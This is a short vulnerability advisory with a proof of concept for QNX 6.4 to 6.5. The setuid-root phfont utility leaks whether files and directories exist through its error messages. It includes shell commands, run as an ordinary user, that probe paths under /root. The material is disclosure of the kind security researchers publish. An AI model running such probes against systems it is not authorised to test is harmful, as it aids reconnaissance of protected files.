#
# QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014
#                         <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate
# files and directories as root due to PfAttachLocalDllArgv() error messages.
#
# You can discover files and directories by observing the following error
# messages and behaviour:
#
# 1) PfAttachLocalDllArgv(): Function not implemented
#	A file exists.
# 2) PfAttachLocalDllArgv(): No such file or directory
#	A directory does not exist.
# 3) And nothing will be returned when a directory exists.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.0
#
# - not vulnerable:
# QNX 6.3.0

$ id
uid=100(user) gid=100

$ /usr/photon/bin/phfont -A -d /root/.ph
$ /usr/photon/bin/phfont -A -d /root/doesnotexist
$ PfAttachLocalDllArgv(): No such file or directory

$ /usr/photon/bin/phfont -A -d /root/.profile
$ PfAttachLocalDllArgv(): Function not implemented

# ls -l /root
total 13
drwx------  5 root      root           1024 Jan 07 16:24 .
drwxr-xr-x 16 root      root           1024 Oct 09 15:03 ..
-rw-rw-r--  1 root      root             51 Jan 24 01:15 .lastlogin
drwx------  3 root      root           1024 Sep 26 18:03 .mozilla
drwxrwxr-x  3 root      root           1024 Sep 27 15:36 .ph
-rw-r--r--  1 root      root            191 Apr 20  2001 .profile
drwx------  2 root      root           1024 Sep 26 18:11 .ssh